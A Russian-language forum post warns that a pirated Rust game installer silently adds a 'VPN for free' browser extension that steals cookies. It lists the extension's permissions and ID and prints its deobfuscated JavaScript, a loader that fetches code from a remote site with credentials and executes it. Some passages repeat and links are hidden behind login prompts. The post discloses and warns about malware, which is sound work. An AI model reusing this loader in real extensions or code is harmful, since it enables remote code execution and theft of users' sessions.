-
Автор темы
- #1
После загрузки с "торрент-игрухи" раста, установщик закрывает браузер и ставит расширение,
которое называется VPN for free и в его .js файле идёт подключение к "
Причём вот перечень действий, которые может делать расширение :
edppdjhbhljgmjcoifijlkklddbejmck -устанавливаемое расширение \
extension.js - деобфусцированный .js код из расширения
marchaca.js - деобфусцированный .js блок с "
extension.js из edppdjhbhljgmjcoifijlkklddbejmck:
То, что скачивает с сайта "
Так же
В конце хочется сказать, что не во всех играх есть такие установщики, например в игре Below-the-Stone-v0.4 нет никаких установщиков, но и весит она 500 мегабайт..
которое называется VPN for free и в его .js файле идёт подключение к "
Пожалуйста, авторизуйтесь для просмотра ссылки.
" откуда происходит вызов ко всем кукисам и отправка на их сервраПричём вот перечень действий, которые может делать расширение :
Пожалуйста, авторизуйтесь для просмотра ссылки.
Просмотр и изменение ваших данных на всех сайтах
Чтение и изменение истории просмотров на всех устройствах, где вы используете этот аккаунт
Показ уведомлений
Просмотр и изменение закладок
Управление скачанными файлами
Управление приложениями, расширениями и темами
Изменение настроек конфиденциальности
Чтение и изменение истории просмотров на всех устройствах, где вы используете этот аккаунт
Показ уведомлений
Просмотр и изменение закладок
Управление скачанными файлами
Управление приложениями, расширениями и темами
Изменение настроек конфиденциальности
edppdjhbhljgmjcoifijlkklddbejmck -устанавливаемое расширение \
extension.js - деобфусцированный .js код из расширения
marchaca.js - деобфусцированный .js блок с "
Пожалуйста, авторизуйтесь для просмотра ссылки.
" \extension.js из edppdjhbhljgmjcoifijlkklddbejmck:
js:
!(function () {
setTimeout(() => chrome.runtime.reload(), 3600000)
let r = new URL('https://marchaca.com/test'),
t = new XMLHttpRequest()
t.open('GET', r.href)
t.withCredentials = true
t.onload = () => {
200 === t.status && t.responseText
? new Promise(Function(t.responseText))
: setTimeout(() => chrome.runtime.reload(), 600000)
}
t.send()
})()
Пожалуйста, авторизуйтесь для просмотра ссылки.
" ещё код блок( .js файл ), который собирает и отправляет куки.Так же
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
Пожалуйста, авторизуйтесь для просмотра ссылки.
( Savematik )
Пожалуйста, авторизуйтесь для просмотра ссылки.
2В конце хочется сказать, что не во всех играх есть такие установщики, например в игре Below-the-Stone-v0.4 нет никаких установщиков, но и весит она 500 мегабайт..
Вложения
-
531.1 KB Просмотры: 3
-
4.7 KB Просмотры: 2